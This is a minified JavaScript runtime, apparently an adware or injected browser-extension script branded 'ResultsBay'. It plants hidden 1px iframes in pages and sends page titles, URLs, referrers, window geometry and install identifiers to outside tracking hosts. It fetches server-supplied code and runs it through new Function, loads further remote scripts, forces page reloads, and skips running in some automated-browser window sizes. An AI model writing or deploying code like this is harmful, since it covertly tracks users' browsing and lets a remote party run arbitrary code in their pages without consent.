(function(){function v(b,a,c){if(b instanceof Array){if("undefined"!=typeof Array.prototype.indexOf)return b.indexOf(a,c);c=c||0;var d=b.length;if(c>=d)return-1;for(0>c&&(c=Math.max(d+c,0));c<d;c++)if(b[c]===a)return c}return-1}function w(){for(var b=0;b<arguments.length;b++)if("undefined"!==typeof arguments[b])return arguments[b];return null}function I(){for(var b=0;b<J.length;b++){var a=J[b].exec(navigator.userAgent);if(a)return b=a.splice(1,2),2>b.length&&b.push("0"),"undefined"!==typeof b[1]&&
(a=parseInt(b[1]))&&(b[1]=a),b}return["Unknown","0"]}function K(b){var a={rawName:"Unknown",rawVersion:"0",name:"Unknown",version:"0"};if(!1==!!b||2>b.length)return a;a.name=a.rawName=b[0];a.version=a.rawVersion=b[1].toString();b=a.version.indexOf(".");-1!==b&&(a.version=a.version.substring(0,b));b=a.rawName.toLowerCase();switch(b){case "mrchrome":a.name="Amigo";break;case "opr":a.name="Opera";break;case "yabrowser":a.name="Yandex";break;case "ir":a.name="Rocket";break;case "unico browser":a.name=
"Unico"}0==b.indexOf("msie")?a.name="MSIE":0==b.indexOf("trident")&&(a.name="MSIE",a.version="11");return a}function x(b,a){if(b.constructor){var c=b.constructor.prototype[a],d=typeof c;if("function"==d||l&&9>l&&"object"==d)return function(){return c.apply(b,arguments)}}if(l&&8>l&&b===h)try{return eval(S.join(a))}catch(e){}return b[a]}function r(b,a){var c=k.createElement("script");c.type="text/javascript";c.src=b;c.onload=c.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||
"complete"==this.readyState){c.onload=c.onreadystatechange=null;c.parentNode.removeChild(c);try{"function"==typeof a&&a()}catch(b){}}};(k.body||k.head).appendChild(c)}function T(b,a,c){var d=p+1E20*Math.random();h[d]=c;r(b+(0<b.indexOf("?")?"&":"?")+a+"="+d,function(){try{delete h[d]}catch(a){}})}function B(b,a){for(var c={},d=b.search.substr(1).split("&"),e=0;e<d.length;e++){var f=d[e].split("=");c[decodeURIComponent(f[0])]=2==f.length?decodeURIComponent(f[1]):""}return c[a]}function u(b){for(var a=
[],c=0;c<b.length;c++){var d=!0===b[c].stripPii?L(b[c].data):b[c].toString();a.push(encodeURIComponent(d.replace(/,/g,"$cma;")))}k.images&&((new Image).src=U+a.shift()+"="+a.join("|,|"))}function L(b){for(var a in C)C.hasOwnProperty(a)&&(b=b.replace(C[a],"{piiRem"+a+"}"));return b}function y(b,a,c){if(b.addEventListener)return b.addEventListener(a,c,!1);if(b.attachEvent)return b.attachEvent("on"+a,c)}function D(b,a,c){if(b.removeEventListener)return b.removeEventListener(a,c,!1);if(b.detachEvent)return b.detachEvent("on"+
a,c)}function V(b){if("function"==typeof M)return M(b);for(var a,c=0,d=z,e="";b.charAt(c|0)||(d="=",c%1);e+=d.charAt(63&a>>8-c%1*8))a=a<<8|b.charCodeAt(c-=-.75);return e}function W(b){for(var a=0,c="";a<b.length;)var d=parseInt(b.charAt(a++),16)<<8|parseInt(b.charAt(a++),16)<<4|parseInt(b.charAt(a++),16),e=d&63,c=c+z.charAt(d>>6),c=c+z.charAt(e);for(;c.length%4;)c+=z.charAt(64);return c}function X(b,a,c){return{success:function(){u(["InitSuccess_8",b,c.geo?c.geo.countryCode:"00",c.productName,c.guid,
a.bitFlags,c.bid,c.browser.name,n,c.installDateUTCms,c.installSource,document.location.hostname])},exception:function(d){u(["InitException_3",b,d||"",c.guid,a.bitFlags,c.bid,c.browser.name,n])},abort:function(){}}}function Y(b,a,c,d){return function(){try{(new Function("client","defaultSettings","customSettings","report",c))(g,b,a,d)}catch(e){d.exception(e)}}}function N(b){for(var a=[],c=0;c<O.length;c++){var d=O[c],e;a:{e=d;for(var f=0;f<e.b.length;f++)if(e.b[f].test(h.name)){e=!0;break a}for(f=
0;f<e.a.length;f++)if(e.a[f].test(k.location.href)){e=!0;break a}e=!1}e&&a.push(d.key)}for(c=0;c<b.length;c++){d=b[c];if(e=0<a.length){a:{e=d.defaultSettings||{};for(f=0;f<a.length;f++)if(!e[a[f]]){e=!1;break a}e=!0}e=!e}e||P(Y(d.defaultSettings,d.customSettings,d.init,X(d.id,d.customSettings,g)),0)}}function Q(){for(var b=p+"_1",a=b,c="https:"==k.location.protocol,d=k.getElementsByTagName("script"),e=0;e<d.length;e++)if(-1<d[e].src.indexOf(Z+"/gsrs")&&"1"!=d[e].getAttribute("d")&&(a=k.createElement("a"),
a.href=d[e].src,g.guid=B(a,"g"),g.installSource=B(a,"is"),n=B(a,"bp"),a=b+n,m=k.getElementById(a),!m)){d[e].setAttribute("d","1");break}var f=k.getElementById(b),e=d=!1;if(f)d=!1,b=f.getAttribute("t"),-1==v(b.split("|"),n)&&(f.setAttribute("t",b+"|"+n),e=!0);else{f=k.createElement("iframe");f.id=b;f.setAttribute("t",n);f.style.width="1px";f.style.height="1px";f.style.display="none";k.body.appendChild(f);var d=e=!0,s=window.location.href;window.setInterval(function(){window.location.href!=s&&(s=window.location.href,
window.location.href=window.location.href)},100)}b=K(I());e&&u(["Runtime_Ran_2",p,g.guid,n,b.name.substr(0,1E3),b.version.substr(0,1E3),c]);for(var c=L(k.title||"").substr(0,1E3),f=[[790,482,0,0],[1024,704,0,0],[1024,697,-8,-8],[1024,706,0,0],[1024,670,0,0],[790,446,0,0],[1024,707,0,0],[1024,669,0,0],[790,518,0,0],[1024,670,0,0],[1024,671,0,0],[1024,632,0,0],[1024,633,0,0],[752,478,4,4],[1024,668,0,0],[1024,666,0,0],[1024,702,0,0],[1024,634,0,0]],e=0,$=f.length;e<$;e++)if(-1<b.name.toLowerCase().indexOf("chrome")&&
h.innerWidth==f[e][0]&&h.innerHeight==f[e][1]&&h.screenX==f[e][2]&&h.screenY==f[e][3])return u(["SkippedRender_2",g.guid||"",p,c,h.location.href.substr(0,4E3),"Platform",b.name.substr(0,1E3),b.version.substr(0,1E3),"00","1"]);m=k.createElement("iframe");m.id=a;m.style.width="1px";m.style.height="1px";m.style.display="none";m.src="https:"+E+"/gscf?n="+encodeURIComponent((h.name||"").substr(0,1E3))+"&t="+encodeURIComponent(c)+"&r="+encodeURIComponent((k.referrer||"").substr(0,4E3))+"&g="+encodeURIComponent(g.guid||
"")+"&is="+encodeURIComponent(g.installSource||"")+"&bp="+encodeURIComponent(n||"BF")+"&l="+encodeURIComponent(!0==d?"1":"0")+"&wx="+encodeURIComponent(w(h.screenX,h.screenLeft,""))+"&wy="+encodeURIComponent(w(h.screenY,h.screenTop,""))+"&ww="+encodeURIComponent(w(h.innerWidth,k.documentElement.clientWidth,""))+"&wh="+encodeURIComponent(w(h.innerHeight,k.documentElement.clientHeight,""));m.setAttribute("t",n);k.body.appendChild(m)}function aa(b){try{var a=b.data;"string"==typeof a&&(a=q.parse(a));
if(a.ext&&a.ext==p){if(m&&b.source==m.contentWindow)if("userdata"==a.msg&&a.installSource&&a.appData){g.installSource=a.installSource;g.ip=a.ip;g.geo=a.geo;g.installDateUTCms=a.installDateUTCms;g.bid=a.bucketId;g.token=a.token;F=a.appData;for(var c=0;c<F.length;c++){var d=F[c];d.id==ba&&(g.tc=!0);(d.blacklistCategories.length||d.whitelistCategories.length||!d.skipUrlCategorization?A:G).push(d)}G.length&&N(G);A.length&&(c={ext:p,msg:"getcategory"},m.contentWindow.postMessage(!l||9<l?c:q.stringify(c),
"*"))}else if("category"==a.msg&&a.categoryData){g.urlCategories=a.categoryData.categories;g.isBadCategory=a.categoryData.isBadCategory;g.isBadUrl=a.categoryData.isBadUrl;g.isBadUrlCategory=g.isBadCategory||g.isBadUrl;for(var c=a.categoryData.categories,d=[],e=0;e<A.length;e++){var f=A[e],s;a:{for(var k=c,n=f.blacklistCategories,H=f.whitelistCategories,t=0;t<H.length;t++)if(-1<v(k,H[t])){s=!0;break a}for(t=0;t<n.length;t++)if(-1<v(k,n[t])){s=!1;break a}s=!H.length||!!n.length}s&&d.push(f)}d.length&&
N(d)}if(b.source==h)if("getguid"==a.msg){var r={ext:p,msg:"guid",guid:g.guid,bf:!0};R(!l||9<l?r:q.stringify(r),"*")}else"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&m.contentWindow.postMessage(!l||9<l?a:q.stringify(a),"https:"+E)}}catch(u){}}var h=window,m,k=document,q,l=!1,p="ResultsBay",E="//api.resultsbay.com",Z="//apiresultsbaycom-a.akamaihd.net",F,n,U="//jsl.infostatsvc.com/?",z="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
S=["(function () {delete ","; return ",";})()"],J=[/\b(IR)\/([\d\.]+)\b/i,/\b(opr)\/([\d\.]+)\b/i,/\b(lunascape)[\/ ]([\d\.]+)\b/i,/\b(maxthon)\/([\d\.]+)\b/i,/\b(yabrowser)\/([\d\.]+)\b/i,/\b(bobrowser)\/([\d\.]+)\b/i,/\b(crossbrowse)\/([\d\.]+)\b/i,/\b(crossbrowser)\/([\d\.]+)\b/i,/\b(unico browser)\/([\d\.]+)\b/i,/\b(mrchrome)\b/i,/\b(wikibrowser)\/([\d\.]+)\b/i,/\b(edge)\/([\d\.]+)\b/i,/\b(chrome)\/([\d\.]+)\b/i,/\b(msie)\s([\d\.]+)\b/i,/\b(trident)\/([\d\.]+)\b/i,/\b(firefox)\/([\d\.]+)\b/i,
/\b(safari)\/([\d\.]+)\b/i,/\b(opera)\/([\d\.]+)\b/i],ba="1065",O=[{key:"tvbp",b:[/^FA[-_]/],a:[/lll[a-zA-Z\d]{11}00/g]},{key:"rvbp",b:[/^__ctxpop.*/i],a:[]}];if(h.top==h){var A=[],G=[],C={Email:/\b[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\b/ig,LicNum:/(\d?[A-Z]{3}-?\d{3,4}|([A-Z]{1,3}(\d{2}-|-)[A-Z]?\d{2,4})|([A-Z]{1,2}\d{5,10}))/gi,PhnNum:/(\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}/g,LrgNum:/\b(?:\d[(). -]*?){9,16}\b/g},
P=x(h,"setTimeout"),M=x(h,"btoa"),R=x(h,"postMessage"),g=function(){function b(){D(k,"DOMContentLoaded",b);for(D(h,"load",b);a.length;)P(a.pop(),0)}var a=[],c={},d=I(),e={};return{productName:p,webDomain:"resultsbay.com",webCdnDomain:"wwwresultsbaycom-a.akamaihd.net",es:"2",tc:!1,browser:K(d),utils:{addEventListener:y,arrayIndexOf:v,changeAppState:function(a,c){if("number"==typeof a&&"boolean"==typeof c){var b={ext:p,msg:"statechange",appid:a,state:c};R(!l||
9<l?b:q.stringify(b),"*")}},removeEventListener:D,base64EncodeText:V,base64EncodeHex:W,getNativeWindowFunction:x,loadScript:r,loadJSONP:T,log:u,ready:function(c){a.push(c);"complete"==k.readyState?b():(y(k,"DOMContentLoaded",b),y(h,"load",b))},require:function(a,b,d){switch(a){case "jquery":b=b||"1";c[a]&&c[a][b]?"function"==typeof d&&d(c[a][b]):r("//ajax.googleapis.com/ajax/libs/jquery/"+b+"/jquery.min.js",function(){c[a]=c[a]||{};c[a][b]=h.jQuery.noConflict(!0);"function"==typeof d&&d(c[a][b])});
break;case "swfobject":b=b||"2";if(c[a]&&c[a][b])"function"==typeof d&&d(c[a][b]);else{var k=h.swfobject;r("//ajax.googleapis.com/ajax/libs/swfobject/"+b+"/swfobject.js",function(){c[a]=c[a]||{};c[a][b]=h.swfobject;h.swfObject=k;"function"==typeof d&&d(c[a][b])})}break;case "dataman":var g=b;if(c[a]&&c[a][g])"function"==typeof d&&d(c[a][g]);else{e[a]=e[a]||{};var l=e[a][g]=e[a][g]||[];l.push(d);if(1===l.length){var m="_"+p.replace(/\s/g,"_")+"Util";r(g+"/utils/js/"+m,function(){c[a]=c[a]||{};c[a][g]=
window[m];for((new Function("delete "+m))();l.length;){var b=l.pop();"function"===typeof b&&b(c[a][g])}})}}}},setBucketId:function(a,b){if(b instanceof Date){var c={ext:p,msg:"setbucket",bid:a,exp:b.valueOf()};m.contentWindow.postMessage(!l||9<l?c:q.stringify(c),"https:"+E)}}},window:{name:h.name},getInstallId:function(){return this.guid},getClientIP:function(){return this.ip}}}();(function(){var b=k.documentMode,a;try{delete k.documentMode,a=k.documentMode,k.documentMode=b}catch(c){}"number"==typeof a?
l=a:"number"==typeof b&&(l=b);y(h,"message",aa);var d=h.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(q=d,g.utils.JSON=q,g.utils.ready(Q)):r("//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js",function(){q=h.JSON;g.utils.JSON=q;"undefined"!=typeof d&&(h.JSON=d);g.utils.ready(Q)})})()}})();
